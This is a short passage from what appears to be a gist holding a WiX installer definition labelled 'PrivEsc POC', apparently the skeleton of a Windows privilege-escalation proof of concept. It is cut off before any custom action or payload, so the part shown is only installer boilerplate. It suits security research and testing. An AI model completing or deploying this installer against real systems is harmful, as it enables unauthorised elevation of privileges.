This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0"?> | |
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi"> | |
<Product Id="*" UpgradeCode="00000000-0000-0000-0000-111111111111" Name="PrivEsc POC" Version="0.0.1" Manufacturer="@_xpn_" Language="1033"> | |
<Package InstallerVersion="200" Compressed="yes" Comments="PrivEsc POC"/> | |
<Directory Id="TARGETDIR" Name="SourceDir"> | |
<Component Id="ApplicationFiles" Guid="11111111-1111-1111-1111-222222222222"></Component> | |
</Directory> | |
<Feature Id="AppFiles" Level="1"> |